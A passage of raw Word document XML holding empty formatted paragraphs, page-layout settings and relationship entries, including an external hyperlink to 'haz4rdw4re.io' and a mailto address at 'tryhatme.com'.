      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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sectPr>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="1440" w:left="1440" w:right="13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hyperlink" Target="http://haz4rdw4re.io" TargetMode="External"/><Relationship Id="rId12"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mailto:michael.ascot@tryhatme.com"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